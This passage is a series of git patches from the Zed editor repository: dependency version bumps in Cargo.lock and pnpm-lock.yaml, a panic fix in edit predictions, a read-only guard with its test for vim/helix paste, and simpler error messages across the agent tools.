"5666a220e8318309225b54a55b270e1b506385adcce10bf5698380441afa0df3" dependencies = [ "anyhow", "async-trait", @@ -20679,9 +20679,9 @@ dependencies = [ [[package]] name = "wiggle" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c13d1ae265bd6e5e608827d2535665453cae5cb64950de66e2d5767d3e32c43a" +checksum = "4e176546937d1311c7608276c8511d3ea9b8e7b916e89b720e12c4d4bbae067c" dependencies = [ "anyhow", "async-trait", @@ -20694,9 +20694,9 @@ dependencies = [ [[package]] name = "wiggle-generate" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "607c4966f6b30da20d24560220137cbd09df722f0558eac81c05624700af5e05" +checksum = "e3f012ad76133d9ac70633c7f954e289fb4c21986059f324fec3c476664ab643" dependencies = [ "anyhow", "heck 0.5.0", @@ -20708,9 +20708,9 @@ dependencies = [ [[package]] name = "wiggle-macro" -version = "36.0.6" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fc36e39412fa35f7cc86b3705dbe154168721dd3e71f6dc4a726b266d5c60c55" +checksum = "4301e6203d3d13eef139fa3aca5f04e9156b4a5f7636ca965b2c10bce410b3d2" dependencies = [ "proc-macro2", "quote", @@ -20751,9 +20751,9 @@ checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "winch-codegen" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0989126b21d12c9923aa2de7ddbcf87db03037b24b7365041d9dd0095b69d8cb" +checksum = "646e2d01f59d7006e24a370762abfb63d5918696ff02197e027efd15252a1f79" dependencies = [ "anyhow", "cranelift-assembler-x64", From 241e5fdb1d1324ae12045107ef7e5af345ec7221 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:17:11 +0200 Subject: [PATCH 154/231] editor: Fix panic in `render_edit_prediction_cursor_popover` (#55604) Fixes ZED-72Z Release Notes: - Fixed a panic in edit predictions --- crates/editor/src/editor.rs | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index c1741cd6215807..a05876d2d9cdbc 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -9066,8 +9066,13 @@ impl Editor { } invalidation_row_range = move_invalidation_row_range.unwrap_or(edit_start_row..edit_end_row); - let target = first_edit_start; - EditPrediction::MoveWithin { target, snapshot } + + let (_, snapshot) = multibuffer.anchor_to_buffer_anchor(first_edit_start)?; + + EditPrediction::MoveWithin { + target: first_edit_start, + snapshot: snapshot.clone(), + } } else { let show_completions_in_menu = self.has_visible_completions_menu(); let show_completions_in_buffer = !self.edit_prediction_visible_in_cursor_popover(true) From 284eb3c7f7a52155c1ffe800420630a044321817 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:17:14 +0200 Subject: [PATCH 155/231] vim: Fix panic when pasting in read-only editor (#55608) Fixes ZED-73F Release Notes: - N/A or Added/Fixed/Improved ... --- crates/vim/src/helix/paste.rs | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/crates/vim/src/helix/paste.rs b/crates/vim/src/helix/paste.rs index c43281421462ee..c8db0722c2c147 100644 --- a/crates/vim/src/helix/paste.rs +++ b/crates/vim/src/helix/paste.rs @@ -28,6 +28,10 @@ impl Vim { // (none of the other helix_ methods call it) self.update_editor(cx, |vim, editor, cx| { + if editor.read_only(cx) { + return; + } + editor.transact(window, cx, |editor, window, cx| { editor.set_clip_at_line_ends(false, cx); @@ -201,6 +205,19 @@ mod test { cx.assert_state("«Xˇ»\n«Xˇ»\n«Xˇ»\nend", Mode::HelixNormal); } + #[gpui::test] + async fn test_read_only_paste(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + cx.set_state("aˇb", Mode::HelixNormal); + cx.write_to_clipboard(ClipboardItem::new_string("clipboard".to_string())); + cx.update_editor(|editor, _window, _cx| editor.set_read_only(true)); + + cx.simulate_keystrokes("p"); + + cx.assert_state("aˇb", Mode::HelixNormal); + } + #[gpui::test] async fn test_paste(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; From 983843234f34c6c6db2b274076a7e678ce45b873 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 12:27:33 +0200 Subject: [PATCH 156/231] agent: Better error messages when tool fails (#55616) Does not actually seem useful to the LLM to include `Failed to receive tool input: ...` in the error message. We now only include the actual error. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/agent/src/tests/mod.rs | 10 +---- crates/agent/src/tests/test_tools.rs | 42 ++++--------------- .../src/tools/context_server_registry.rs | 2 +- crates/agent/src/tools/copy_path_tool.rs | 5 +-- .../agent/src/tools/create_directory_tool.rs | 5 +-- crates/agent/src/tools/delete_path_tool.rs | 5 +-- crates/agent/src/tools/diagnostics_tool.rs | 5 +-- crates/agent/src/tools/edit_file_tool.rs | 2 +- crates/agent/src/tools/fetch_tool.rs | 5 +-- crates/agent/src/tools/find_path_tool.rs | 2 +- crates/agent/src/tools/grep_tool.rs | 2 +- crates/agent/src/tools/list_directory_tool.rs | 2 +- crates/agent/src/tools/move_path_tool.rs | 2 +- crates/agent/src/tools/now_tool.rs | 5 +-- crates/agent/src/tools/open_tool.rs | 5 +-- .../src/tools/restore_file_from_disk_tool.rs | 5 +-- crates/agent/src/tools/save_file_tool.rs | 5 +-- crates/agent/src/tools/spawn_agent_tool.rs | 2 +- crates/agent/src/tools/terminal_tool.rs | 5 +-- crates/agent/src/tools/update_plan_tool.rs | 5 +-- crates/agent/src/tools/web_search_tool.rs | 2 +- 21 files changed, 30 insertions(+), 93 deletions(-) diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index 513ffce0fa9ab0..c2efda7673d6aa 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -4063,14 +4063,8 @@ async fn test_streaming_tool_completes_when_llm_stream_ends_without_final_input( tool_use_id: tool_use.id.clone(), tool_name: tool_use.name, is_error: true, - content: vec![ - "Failed to receive tool input: tool input was not fully received" - .into(), - ], - output: Some( - "Failed to receive tool input: tool input was not fully received" - .into() - ), + content: vec!["tool input was not fully received".into(),], + output: Some("tool input was not fully received".into()), } )], cache: true, diff --git a/crates/agent/src/tests/test_tools.rs b/crates/agent/src/tests/test_tools.rs index 750ea48dc85875..56a5733761c8e2 100644 --- a/crates/agent/src/tests/test_tools.rs +++ b/crates/agent/src/tests/test_tools.rs @@ -61,10 +61,7 @@ impl AgentTool for StreamingEchoTool { ) -> Task> { let wait_until_complete_rx = self.wait_until_complete_rx.lock().unwrap().take(); cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; if let Some(rx) = wait_until_complete_rx { rx.await.ok(); } @@ -127,7 +124,7 @@ impl AgentTool for StreamingJsonErrorContextTool { )); } Err(error) => { - return Err(format!("Failed to receive tool input: {error}")); + return Err(error.to_string()); } } } @@ -220,10 +217,7 @@ impl AgentTool for EchoTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; Ok(input.text) }) } @@ -271,10 +265,7 @@ impl AgentTool for DelayTool { { let executor = cx.background_executor().clone(); cx.foreground_executor().spawn(async move { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; executor.timer(Duration::from_millis(input.ms)).await; Ok("Ding".to_string()) }) @@ -311,10 +302,7 @@ impl AgentTool for ToolRequiringPermission { cx: &mut App, ) -> Task> { cx.spawn(async move |cx| { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; let authorize = cx.update(|cx| { let context = crate::ToolPermissionContext::new(Self::NAME, vec![String::new()]); @@ -359,10 +347,7 @@ impl AgentTool for ToolRequiringPermission2 { cx: &mut App, ) -> Task> { cx.spawn(async move |cx| { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; let authorize = cx.update(|cx| { let context = crate::ToolPermissionContext::new(Self::NAME, vec![String::new()]); @@ -404,10 +389,7 @@ impl AgentTool for InfiniteTool { cx: &mut App, ) -> Task> { cx.foreground_executor().spawn(async move { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; future::pending::<()>().await; unreachable!() }) @@ -460,10 +442,7 @@ impl AgentTool for CancellationAwareTool { cx: &mut App, ) -> Task> { cx.foreground_executor().spawn(async move { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; // Wait for cancellation - this tool does nothing but wait to be cancelled event_stream.cancelled_by_user().await; self.was_cancelled.store(true, Ordering::SeqCst); @@ -519,10 +498,7 @@ impl AgentTool for WordListTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let _input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let _input = input.recv().await.map_err(|e| e.to_string())?; Ok("ok".to_string()) }) } diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 9948b587f4fcec..01601679c90fe8 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -350,7 +350,7 @@ impl AnyAgentTool for ContextServerTool { let input = input .recv() .await - .map_err(|e| anyhow::anyhow!(format!("Failed to receive tool input: {e}")))?; + .map_err(|e| anyhow::anyhow!(e.to_string()))?; authorize .await diff --git a/crates/agent/src/tools/copy_path_tool.rs b/crates/agent/src/tools/copy_path_tool.rs index b40f26bee7dec9..c26317979053ab 100644 --- a/crates/agent/src/tools/copy_path_tool.rs +++ b/crates/agent/src/tools/copy_path_tool.rs @@ -88,10 +88,7 @@ impl AgentTool for CopyPathTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let paths = vec![input.source_path.clone(), input.destination_path.clone()]; let decision = cx.update(|cx| { decide_permission_for_paths(Self::NAME, &paths, &AgentSettings::get_global(cx)) diff --git a/crates/agent/src/tools/create_directory_tool.rs b/crates/agent/src/tools/create_directory_tool.rs index 602b8809328072..da2b33fa5f9e39 100644 --- a/crates/agent/src/tools/create_directory_tool.rs +++ b/crates/agent/src/tools/create_directory_tool.rs @@ -77,10 +77,7 @@ impl AgentTool for CreateDirectoryTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let decision = cx.update(|cx| { decide_permission_for_path(Self::NAME, &input.path, AgentSettings::get_global(cx)) }); diff --git a/crates/agent/src/tools/delete_path_tool.rs b/crates/agent/src/tools/delete_path_tool.rs index 9e48d426411ea9..4e4747eb026a4e 100644 --- a/crates/agent/src/tools/delete_path_tool.rs +++ b/crates/agent/src/tools/delete_path_tool.rs @@ -81,10 +81,7 @@ impl AgentTool for DeletePathTool { let project = self.project.clone(); let action_log = self.action_log.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let path = input.path; let decision = cx.update(|cx| { diff --git a/crates/agent/src/tools/diagnostics_tool.rs b/crates/agent/src/tools/diagnostics_tool.rs index a59f61ae97a187..1d6528007d0463 100644 --- a/crates/agent/src/tools/diagnostics_tool.rs +++ b/crates/agent/src/tools/diagnostics_tool.rs @@ -93,10 +93,7 @@ impl AgentTool for DiagnosticsTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; match input.path { Some(path) if !path.is_empty() => { diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 9d5f7953ffff96..e22436c7a80473 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -439,7 +439,7 @@ impl EditFileTool { }, Err(error) => { return EditSessionResult::Failed { - error: format!("Failed to receive tool input: {error}"), + error: error.to_string(), session, }; } diff --git a/crates/agent/src/tools/fetch_tool.rs b/crates/agent/src/tools/fetch_tool.rs index ca8e9a3697e6ff..716b4b364eed1e 100644 --- a/crates/agent/src/tools/fetch_tool.rs +++ b/crates/agent/src/tools/fetch_tool.rs @@ -143,10 +143,7 @@ impl AgentTool for FetchTool { ) -> Task> { let http_client = self.http_client.clone(); cx.spawn(async move |cx| { - let input: FetchToolInput = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input: FetchToolInput = input.recv().await.map_err(|e| e.to_string())?; let authorize = cx.update(|cx| { let context = diff --git a/crates/agent/src/tools/find_path_tool.rs b/crates/agent/src/tools/find_path_tool.rs index 66d127e756ca83..952996b9c89f66 100644 --- a/crates/agent/src/tools/find_path_tool.rs +++ b/crates/agent/src/tools/find_path_tool.rs @@ -128,7 +128,7 @@ impl AgentTool for FindPathTool { let project = self.project.clone(); cx.spawn(async move |cx| { let input = input.recv().await.map_err(|e| FindPathToolOutput::Error { - error: format!("Failed to receive tool input: {e}"), + error: e.to_string(), })?; let search_paths_task = cx.update(|cx| search_paths(&input.glob, project, cx)); diff --git a/crates/agent/src/tools/grep_tool.rs b/crates/agent/src/tools/grep_tool.rs index 485084a406e3f8..32d872f6578e35 100644 --- a/crates/agent/src/tools/grep_tool.rs +++ b/crates/agent/src/tools/grep_tool.rs @@ -126,7 +126,7 @@ impl AgentTool for GrepTool { let input = input .recv() .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + .map_err(|e| e.to_string())?; let results = cx.update(|cx| { let path_style = project.read(cx).path_style(cx); diff --git a/crates/agent/src/tools/list_directory_tool.rs b/crates/agent/src/tools/list_directory_tool.rs index 8431648b64a8a0..94e2a0b2eaf7ad 100644 --- a/crates/agent/src/tools/list_directory_tool.rs +++ b/crates/agent/src/tools/list_directory_tool.rs @@ -155,7 +155,7 @@ impl AgentTool for ListDirectoryTool { let input = input .recv() .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + .map_err(|e| e.to_string())?; // Sometimes models will return these even though we tell it to give a path and not a glob. // When this happens, just list the root worktree directories. diff --git a/crates/agent/src/tools/move_path_tool.rs b/crates/agent/src/tools/move_path_tool.rs index abf45a7ec1738f..629b40dbf7231b 100644 --- a/crates/agent/src/tools/move_path_tool.rs +++ b/crates/agent/src/tools/move_path_tool.rs @@ -104,7 +104,7 @@ impl AgentTool for MovePathTool { let input = input .recv() .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + .map_err(|e| e.to_string())?; let paths = vec![input.source_path.clone(), input.destination_path.clone()]; let decision = cx.update(|cx| { decide_permission_for_paths(Self::NAME, &paths, AgentSettings::get_global(cx)) diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index 9721c923b6e8d2..f8f4e0d91b5f0e 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -55,10 +55,7 @@ impl AgentTool for NowTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let now = match input.timezone { Timezone::Utc => Utc::now().to_rfc3339(), Timezone::Local => Local::now().to_rfc3339(), diff --git a/crates/agent/src/tools/open_tool.rs b/crates/agent/src/tools/open_tool.rs index dc72c758e36b04..7329965e6226e1 100644 --- a/crates/agent/src/tools/open_tool.rs +++ b/crates/agent/src/tools/open_tool.rs @@ -67,10 +67,7 @@ impl AgentTool for OpenTool { ) -> Task> { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; // If path_or_url turns out to be a path in the project, make it absolute. let (abs_path, initial_title) = cx.update(|cx| { diff --git a/crates/agent/src/tools/restore_file_from_disk_tool.rs b/crates/agent/src/tools/restore_file_from_disk_tool.rs index aaab281046435c..3b2c95596c3b2b 100644 --- a/crates/agent/src/tools/restore_file_from_disk_tool.rs +++ b/crates/agent/src/tools/restore_file_from_disk_tool.rs @@ -75,10 +75,7 @@ impl AgentTool for RestoreFileFromDiskTool { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; // Check for any immediate deny before doing async work. for path in &input.paths { diff --git a/crates/agent/src/tools/save_file_tool.rs b/crates/agent/src/tools/save_file_tool.rs index 8fe27fc350b1b8..f70420984157fa 100644 --- a/crates/agent/src/tools/save_file_tool.rs +++ b/crates/agent/src/tools/save_file_tool.rs @@ -72,10 +72,7 @@ impl AgentTool for SaveFileTool { let project = self.project.clone(); cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; // Check for any immediate deny before doing async work. for path in &input.paths { diff --git a/crates/agent/src/tools/spawn_agent_tool.rs b/crates/agent/src/tools/spawn_agent_tool.rs index cdb36126f5763d..5cb2f8c98cd92f 100644 --- a/crates/agent/src/tools/spawn_agent_tool.rs +++ b/crates/agent/src/tools/spawn_agent_tool.rs @@ -137,7 +137,7 @@ impl AgentTool for SpawnAgentTool { .await .map_err(|e| SpawnAgentToolOutput::Error { session_id: None, - error: format!("Failed to receive tool input: {e}"), + error: e.to_string(), session_info: None, })?; diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index ffbd4393bc92ec..34d19c581a40da 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -89,10 +89,7 @@ impl AgentTool for TerminalTool { cx: &mut App, ) -> Task> { cx.spawn(async move |cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; let (working_dir, authorize) = cx.update(|cx| { let working_dir = diff --git a/crates/agent/src/tools/update_plan_tool.rs b/crates/agent/src/tools/update_plan_tool.rs index 39e88590b1872a..ebc84ad03186fc 100644 --- a/crates/agent/src/tools/update_plan_tool.rs +++ b/crates/agent/src/tools/update_plan_tool.rs @@ -90,10 +90,7 @@ impl AgentTool for UpdatePlanTool { cx: &mut App, ) -> Task> { cx.spawn(async move |_cx| { - let input = input - .recv() - .await - .map_err(|e| format!("Failed to receive tool input: {e}"))?; + let input = input.recv().await.map_err(|e| e.to_string())?; event_stream.update_plan(Self::to_plan(input)); diff --git a/crates/agent/src/tools/web_search_tool.rs b/crates/agent/src/tools/web_search_tool.rs index 271829c626294a..2938cee3e1d80f 100644 --- a/crates/agent/src/tools/web_search_tool.rs +++ b/crates/agent/src/tools/web_search_tool.rs @@ -78,7 +78,7 @@ impl AgentTool for WebSearchTool { .recv() .await .map_err(|e| WebSearchToolOutput::Error { - error: format!("Failed to receive tool input: {e}"), + error: e.to_string(), })?; let authorize = cx.update(|cx| { From c80c4c0fd63da098884ba43e62c4d3de04ab8eac Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 4 May 2026 12:31:07 +0200 Subject: [PATCH 157/231] Update danger deps for CI (#55615) Release Notes: - N/A --- script/danger/package.json | 2 +- script/danger/pnpm-lock.yaml | 273 +++++++++++++++-------------------- 2 files changed, 115 insertions(+), 160 deletions(-) diff --git a/script/danger/package.json b/script/danger/package.json index be44da6233a1c5..b0c33a3f505909 100644 --- a/script/danger/package.json +++ b/script/danger/package.json @@ -7,7 +7,7 @@ "danger": "danger" }, "devDependencies": { - "danger": "13.0.4", + "danger": "13.0.7", "danger-plugin-pr-hygiene": "0.7.1" } } diff --git a/script/danger/pnpm-lock.yaml b/script/danger/pnpm-lock.yaml index eea293cfed78fc..197840ca3b8b43 100644 --- a/script/danger/pnpm-lock.yaml +++ b/script/danger/pnpm-lock.yaml @@ -9,8 +9,8 @@ importers: .: devDependencies: danger: - specifier: 13.0.4 - version: 13.0.4 + specifier: 13.0.7 + version: 13.0.7 danger-plugin-pr-hygiene: specifier: 0.7.1 version: 0.7.1 @@ -81,17 +81,13 @@ packages: '@octokit/types@13.10.0': resolution: {integrity: sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==} - '@tootallnate/once@2.0.0': - resolution: {integrity: sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==} - engines: {node: '>= 10'} + agent-base@7.1.4: + resolution: {integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==} + engines: {node: '>= 14'} - agent-base@6.0.2: - resolution: {integrity: sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==} - engines: {node: '>= 6.0.0'} - - ansi-styles@3.2.1: - resolution: {integrity: sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==} - engines: {node: '>=4'} + ansi-styles@4.3.0: + resolution: {integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==} + engines: {node: '>=8'} async-retry@1.2.3: resolution: {integrity: sha512-tfDb02Th6CE6pJUF2gjW5ZVjsgwlucVXOEQMvEX9JgSJMs9gAX+Nz3xRuJBKuUYjTSYORqvDBORdAQ3LU59g7Q==} @@ -114,15 +110,16 @@ packages: resolution: {integrity: sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==} engines: {node: '>= 0.4'} - chalk@2.4.2: - resolution: {integrity: sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==} - engines: {node: '>=4'} + chalk@4.1.2: + resolution: {integrity: sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==} + engines: {node: '>=10'} - color-convert@1.9.3: - resolution: {integrity: sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==} + color-convert@2.0.1: + resolution: {integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==} + engines: {node: '>=7.0.0'} - color-name@1.1.3: - resolution: {integrity: sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==} + color-name@1.1.4: + resolution: {integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==} colors@1.4.0: resolution: {integrity: sha512-a+UqTh4kgZg/SlGvfbzDHpgRu7AAQOmmqRHJnxhRZICKFUT91brVhNNt58CMWU9PsBbv3PDCZUHbVxuDiH2mtA==} @@ -131,19 +128,19 @@ packages: commander@2.20.3: resolution: {integrity: sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==} - core-js@3.45.1: - resolution: {integrity: sha512-L4NPsJlCfZsPeXukyzHFlg/i7IIVwHSItR0wg0FLNqYClJ4MQYTYLbC7EkjKYRLZF2iof2MUgN0EGy7MdQFChg==} + core-js@3.49.0: + resolution: {integrity: sha512-es1U2+YTtzpwkxVLwAFdSpaIMyQaq0PBgm3YD1W3Qpsn1NAmO3KSgZfu+oGSWVu6NvLHoHCV/aYcsE5wiB7ALg==} danger-plugin-pr-hygiene@0.7.1: resolution: {integrity: sha512-ll070nNaL3OeO2nooYWflPE/CRKLeq8GiH2C68u5zM3gW4gepH89GhVv0sYNNGLx4cYwa1zZ/TuiYYhC49z06Q==} - danger@13.0.4: - resolution: {integrity: sha512-IAdQ5nSJyIs4zKj6AN35ixt2B0Ce3WZUm3IFe/CMnL/Op7wV7IGg4D348U0EKNaNPP58QgXbdSk9pM+IXP1QXg==} + danger@13.0.7: + resolution: {integrity: sha512-H7Syz9P3np7tgOjTYs1DDogjlknPWYwBIJXUTFIK5iFZOQ0b8irkUz5swOLFUmw7j0aKuybhwkXTcfyHFvRzCQ==} engines: {node: '>=18'} hasBin: true - debug@4.4.1: - resolution: {integrity: sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==} + debug@4.4.3: + resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} engines: {node: '>=6.0'} peerDependencies: supports-color: '*' @@ -173,10 +170,6 @@ packages: resolution: {integrity: sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==} engines: {node: '>= 0.4'} - escape-string-regexp@1.0.5: - resolution: {integrity: sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==} - engines: {node: '>=0.8.0'} - fast-json-patch@3.1.1: resolution: {integrity: sha512-vf6IHUX2SBcA+5/+4883dsIjpBTqmfBjmYiWK1savxQmFk4JfBMLa7ynTYOs1Rolp/T1betJxHiGD3g1Mn8lUQ==} @@ -195,37 +188,33 @@ packages: resolution: {integrity: sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==} engines: {node: '>= 0.4'} - get-stdin@6.0.0: - resolution: {integrity: sha512-jp4tHawyV7+fkkSKyvjuLZswblUtz+SQKzSWnBbii16BuZksJlU1wuBYXY75r+duh/llF1ur6oNwi+2ZzjKZ7g==} - engines: {node: '>=4'} - gopd@1.2.0: resolution: {integrity: sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==} engines: {node: '>= 0.4'} - has-flag@2.0.0: - resolution: {integrity: sha512-P+1n3MnwjR/Epg9BBo1KT8qbye2g2Ou4sFumihwt6I4tsUX7jnLcX4BTOSKg/B1ZrIYMN9FcEnG4x5a7NB8Eng==} - engines: {node: '>=0.10.0'} + has-flag@4.0.0: + resolution: {integrity: sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==} + engines: {node: '>=8'} - has-flag@3.0.0: - resolution: {integrity: sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==} - engines: {node: '>=4'} + has-flag@5.0.1: + resolution: {integrity: sha512-CsNUt5x9LUdx6hnk/E2SZLsDyvfqANZSUq4+D3D8RzDJ2M+HDTIkF60ibS1vHaK55vzgiZw1bEPFG9yH7l33wA==} + engines: {node: '>=12'} has-symbols@1.1.0: resolution: {integrity: sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==} engines: {node: '>= 0.4'} - hasown@2.0.2: - resolution: {integrity: 